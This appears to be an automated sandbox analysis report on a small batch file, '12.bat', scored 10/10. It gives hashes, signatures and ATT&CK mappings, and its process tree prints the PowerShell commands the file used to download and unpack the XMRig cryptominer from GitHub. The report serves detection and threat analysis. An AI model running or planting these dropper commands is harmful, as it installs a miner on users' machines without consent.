Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    12.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\12.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2148

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35RTXB9PRJ8U38OHYLCK.temp
    Filesize

    7KB

    MD5

    646692e6e76270f436a0babeeba5978f

    SHA1

    e3101809bc4ce6c44cd2d05731aa3abd7ca01873

    SHA256

    963714d17f113258f725d696f7d780cf0aa85a7107e692070f2bbf5967f69497

    SHA512

    d3144cff9f969332b6449e8156684d71b37a44a7fb349e9da7a96a22acde1dbdaee63fb0634f29d58e20fe65918d8bc5e6c773303410236eba008454a81bf39e

  • memory/2132-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp
    Filesize

    4KB

  • memory/2132-5-0x000000001B710000-0x000000001B9F2000-memory.dmp
    Filesize

    2.9MB

  • memory/2132-6-0x00000000022C0000-0x00000000022C8000-memory.dmp
    Filesize

    32KB

  • memory/2132-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2132-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2132-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2132-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2132-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2132-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp
    Filesize

    9.6MB

  • memory/2148-19-0x0000000001F70000-0x0000000001F78000-memory.dmp
    Filesize

    32KB

  • memory/2148-18-0x000000001B650000-0x000000001B932000-memory.dmp
    Filesize

    2.9MB